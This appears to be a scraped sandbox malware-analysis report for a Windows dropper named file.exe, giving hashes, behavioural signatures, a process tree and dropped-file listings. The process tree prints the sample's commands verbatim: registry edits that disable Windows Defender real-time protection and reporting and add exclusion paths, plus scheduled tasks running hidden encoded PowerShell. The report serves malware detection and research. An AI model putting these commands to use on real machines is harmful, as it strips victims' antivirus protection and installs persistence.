Analysis
-
max time kernel
154s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
23-11-2022 14:34
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20221111-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
293bcb13a9d502897ac154d264a446e9
-
SHA1
c786d5c870e7041e2559d99bd548bccafe23574e
-
SHA256
64bc066b8f3f1b3a29c41d115b18d998f467166eb44ae10fb27f8d65ad19767c
-
SHA512
c95fc69a644da84ee9009f443b02d4e2b8a57491e0df33054cf7ab5e9f52362fa2d9c655a61af9392bd184d61ca580206fd6da41494b5afb49a2b1a8f1f151d9
-
SSDEEP
196608:91OU82JjFcnOlU6DOKr9UanEcEFi+53u3N1ep:3OU82JjOn32OgmPD5UN1s
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LzrOtnkAyuDpOCzW = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LzrOtnkAyuDpOCzW = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Executes dropped EXE 3 IoCs
Processes:
Install.exeInstall.exeGkPpHJI.exepid process 1964 Install.exe 1496 Install.exe 1456 GkPpHJI.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 8 IoCs
Processes:
file.exeInstall.exeInstall.exepid process 1428 file.exe 1964 Install.exe 1964 Install.exe 1964 Install.exe 1964 Install.exe 1496 Install.exe 1496 Install.exe 1496 Install.exe -
Drops file in System32 directory 7 IoCs
Processes:
Install.exepowershell.EXEGkPpHJI.exepowershell.EXEpowershell.EXEdescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol GkPpHJI.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini GkPpHJI.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol GkPpHJI.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\bPisEBnRwoxYOmuHrm.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 588 schtasks.exe 1936 schtasks.exe 520 schtasks.exe 1320 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 6 IoCs
Processes:
wscript.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEpid process 1144 powershell.EXE 1144 powershell.EXE 1144 powershell.EXE 1868 powershell.EXE 1868 powershell.EXE 1868 powershell.EXE 1708 powershell.EXE 1708 powershell.EXE 1708 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEdescription pid process Token: SeDebugPrivilege 1144 powershell.EXE Token: SeDebugPrivilege 1868 powershell.EXE Token: SeDebugPrivilege 1708 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exedescription pid process target process PID 1428 wrote to memory of 1964 1428 file.exe Install.exe PID 1428 wrote to memory of 1964 1428 file.exe Install.exe PID 1428 wrote to memory of 1964 1428 file.exe Install.exe PID 1428 wrote to memory of 1964 1428 file.exe Install.exe PID 1428 wrote to memory of 1964 1428 file.exe Install.exe PID 1428 wrote to memory of 1964 1428 file.exe Install.exe PID 1428 wrote to memory of 1964 1428 file.exe Install.exe PID 1964 wrote to memory of 1496 1964 Install.exe Install.exe PID 1964 wrote to memory of 1496 1964 Install.exe Install.exe PID 1964 wrote to memory of 1496 1964 Install.exe Install.exe PID 1964 wrote to memory of 1496 1964 Install.exe Install.exe PID 1964 wrote to memory of 1496 1964 Install.exe Install.exe PID 1964 wrote to memory of 1496 1964 Install.exe Install.exe PID 1964 wrote to memory of 1496 1964 Install.exe Install.exe PID 1496 wrote to memory of 616 1496 Install.exe forfiles.exe PID 1496 wrote to memory of 616 1496 Install.exe forfiles.exe PID 1496 wrote to memory of 616 1496 Install.exe forfiles.exe PID 1496 wrote to memory of 616 1496 Install.exe forfiles.exe PID 1496 wrote to memory of 616 1496 Install.exe forfiles.exe PID 1496 wrote to memory of 616 1496 Install.exe forfiles.exe PID 1496 wrote to memory of 616 1496 Install.exe forfiles.exe PID 1496 wrote to memory of 1720 1496 Install.exe forfiles.exe PID 1496 wrote to memory of 1720 1496 Install.exe forfiles.exe PID 1496 wrote to memory of 1720 1496 Install.exe forfiles.exe PID 1496 wrote to memory of 1720 1496 Install.exe forfiles.exe PID 1496 wrote to memory of 1720 1496 Install.exe forfiles.exe PID 1496 wrote to memory of 1720 1496 Install.exe forfiles.exe PID 1496 wrote to memory of 1720 1496 Install.exe forfiles.exe PID 1720 wrote to memory of 812 1720 forfiles.exe cmd.exe PID 1720 wrote to memory of 812 1720 forfiles.exe cmd.exe PID 616 wrote to memory of 760 616 forfiles.exe cmd.exe PID 1720 wrote to memory of 812 1720 forfiles.exe cmd.exe PID 616 wrote to memory of 760 616 forfiles.exe cmd.exe PID 616 wrote to memory of 760 616 forfiles.exe cmd.exe PID 1720 wrote to memory of 812 1720 forfiles.exe cmd.exe PID 616 wrote to memory of 760 616 forfiles.exe cmd.exe PID 1720 wrote to memory of 812 1720 forfiles.exe cmd.exe PID 1720 wrote to memory of 812 1720 forfiles.exe cmd.exe PID 616 wrote to memory of 760 616 forfiles.exe cmd.exe PID 616 wrote to memory of 760 616 forfiles.exe cmd.exe PID 1720 wrote to memory of 812 1720 forfiles.exe cmd.exe PID 616 wrote to memory of 760 616 forfiles.exe cmd.exe PID 760 wrote to memory of 1456 760 cmd.exe reg.exe PID 760 wrote to memory of 1456 760 cmd.exe reg.exe PID 812 wrote to memory of 1504 812 cmd.exe reg.exe PID 760 wrote to memory of 1456 760 cmd.exe reg.exe PID 812 wrote to memory of 1504 812 cmd.exe reg.exe PID 812 wrote to memory of 1504 812 cmd.exe reg.exe PID 760 wrote to memory of 1456 760 cmd.exe reg.exe PID 760 wrote to memory of 1456 760 cmd.exe reg.exe PID 760 wrote to memory of 1456 760 cmd.exe reg.exe PID 760 wrote to memory of 1456 760 cmd.exe reg.exe PID 812 wrote to memory of 1504 812 cmd.exe reg.exe PID 812 wrote to memory of 1504 812 cmd.exe reg.exe PID 812 wrote to memory of 1504 812 cmd.exe reg.exe PID 812 wrote to memory of 1504 812 cmd.exe reg.exe PID 812 wrote to memory of 1740 812 cmd.exe reg.exe PID 812 wrote to memory of 1740 812 cmd.exe reg.exe PID 812 wrote to memory of 1740 812 cmd.exe reg.exe PID 812 wrote to memory of 1740 812 cmd.exe reg.exe PID 812 wrote to memory of 1740 812 cmd.exe reg.exe PID 812 wrote to memory of 1740 812 cmd.exe reg.exe PID 812 wrote to memory of 1740 812 cmd.exe reg.exe PID 760 wrote to memory of 1524 760 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Users\Admin\AppData\Local\Temp\7zS7198.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Users\Admin\AppData\Local\Temp\7zS7A30.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:760 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1456
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1524
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:812 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1504
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1740
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggrpjqdlJ" /SC once /ST 03:03:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1936 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggrpjqdlJ"4⤵PID:1940
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggrpjqdlJ"4⤵PID:1272
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bPisEBnRwoxYOmuHrm" /SC once /ST 15:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\GkPpHJI.exe\" mF /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:520
-
C:\Windows\system32\taskeng.exetaskeng.exe {26FDB7FA-C2FA-499C-81D9-C1B48CF1104E} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵PID:1864
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1556
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1740
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1596
-
C:\Windows\system32\taskeng.exetaskeng.exe {C1D00ABC-882B-42E8-9FFF-A7AD5E4A45D4} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\GkPpHJI.exeC:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\GkPpHJI.exe mF /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1456 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwbxsPulX" /SC once /ST 09:24:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1320 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwbxsPulX"3⤵PID:1860
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwbxsPulX"3⤵PID:860
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:852
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1224 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:520
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1756 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gejqTgBnz" /SC once /ST 11:10:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:588 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gejqTgBnz"3⤵PID:1916
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gejqTgBnz"3⤵PID:2008
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:323⤵PID:992
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2036 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:643⤵PID:1944
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1764 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:323⤵PID:1540
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:324⤵PID:988
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:643⤵PID:964
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:644⤵PID:1856
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\LzrOtnkAyuDpOCzW\HYQiLiWO\wwIhKxSeMaycmZhX.wsf"3⤵PID:824
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\LzrOtnkAyuDpOCzW\HYQiLiWO\wwIhKxSeMaycmZhX.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1728
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1620
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1724
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD56ebc8b5c2f88d55faf7caabefabd5957
SHA189ad8fb53679bd16b980fcd74a395e7475e930bc
SHA25654d4c1af2f899aaaa9e46dad70d55f516e953b761e4c46980e985aa29ae3dbab
SHA5122c131294f735eb5c25e04b9db4b52dde07df5d60afcbf0c5b9f27b1e93901ef378fcc812f94176cf216e0e8d967dbaae6854f901a82d34d370e3f9f84300d84e
-
Filesize
6.3MB
MD56ebc8b5c2f88d55faf7caabefabd5957
SHA189ad8fb53679bd16b980fcd74a395e7475e930bc
SHA25654d4c1af2f899aaaa9e46dad70d55f516e953b761e4c46980e985aa29ae3dbab
SHA5122c131294f735eb5c25e04b9db4b52dde07df5d60afcbf0c5b9f27b1e93901ef378fcc812f94176cf216e0e8d967dbaae6854f901a82d34d370e3f9f84300d84e
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD554a34c0c1adec2d490993a4efd5fd72c
SHA14812f1315f3f9aa295dd43920f97c39747db8b14
SHA2566ad487caacfef16257a9c8951001b9fb4e857ed52008522cb3d8beee21e59768
SHA512b01c972a43f6f0adb1f2cba19d7176f2c2f5a52654743cf23c20c76b7f6545d6b932d4359080ddb15f27f30497a20bd32531a5ea0cf60807c32ac01771410c18
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD562c1276f685e627bdecf5518645cd8ac
SHA1f6849f428f3903c70b1ee1c236875b2907847056
SHA256e093d5e34799e81e6ee9e7094e7a37e1c86ca4e9c43e971bb68df904e8664fae
SHA5127ecc4fc72089830b9a1f52c0f5782fc50bcacca3a54f6839dc666306a0471eb0ed18ecffa0397eb7085531091a25a9290cf86e8119a3f095aca390ecc3438de7
-
Filesize
8KB
MD5998e761ffd99a24de32e8b9abc83cf7d
SHA1c49e7a2cc86461515ba1c33682879f2b00cafaa3
SHA256e8b70e4d6051fa0602c9256ba0735bc60b4b60f433c95cdbded37b6768e047b3
SHA5127ffd1fffb6394cafe76a9b9c8c3ac7b14b5d55c5415d6d548e7ef252bfbdbe99fb45191cfd3dd825c7af0c721e94784a990fef8dc97ec717eadfd6ddf8abcbd1
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.3MB
MD56ebc8b5c2f88d55faf7caabefabd5957
SHA189ad8fb53679bd16b980fcd74a395e7475e930bc
SHA25654d4c1af2f899aaaa9e46dad70d55f516e953b761e4c46980e985aa29ae3dbab
SHA5122c131294f735eb5c25e04b9db4b52dde07df5d60afcbf0c5b9f27b1e93901ef378fcc812f94176cf216e0e8d967dbaae6854f901a82d34d370e3f9f84300d84e
-
Filesize
6.3MB
MD56ebc8b5c2f88d55faf7caabefabd5957
SHA189ad8fb53679bd16b980fcd74a395e7475e930bc
SHA25654d4c1af2f899aaaa9e46dad70d55f516e953b761e4c46980e985aa29ae3dbab
SHA5122c131294f735eb5c25e04b9db4b52dde07df5d60afcbf0c5b9f27b1e93901ef378fcc812f94176cf216e0e8d967dbaae6854f901a82d34d370e3f9f84300d84e
-
Filesize
6.3MB
MD56ebc8b5c2f88d55faf7caabefabd5957
SHA189ad8fb53679bd16b980fcd74a395e7475e930bc
SHA25654d4c1af2f899aaaa9e46dad70d55f516e953b761e4c46980e985aa29ae3dbab
SHA5122c131294f735eb5c25e04b9db4b52dde07df5d60afcbf0c5b9f27b1e93901ef378fcc812f94176cf216e0e8d967dbaae6854f901a82d34d370e3f9f84300d84e
-
Filesize
6.3MB
MD56ebc8b5c2f88d55faf7caabefabd5957
SHA189ad8fb53679bd16b980fcd74a395e7475e930bc
SHA25654d4c1af2f899aaaa9e46dad70d55f516e953b761e4c46980e985aa29ae3dbab
SHA5122c131294f735eb5c25e04b9db4b52dde07df5d60afcbf0c5b9f27b1e93901ef378fcc812f94176cf216e0e8d967dbaae6854f901a82d34d370e3f9f84300d84e
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77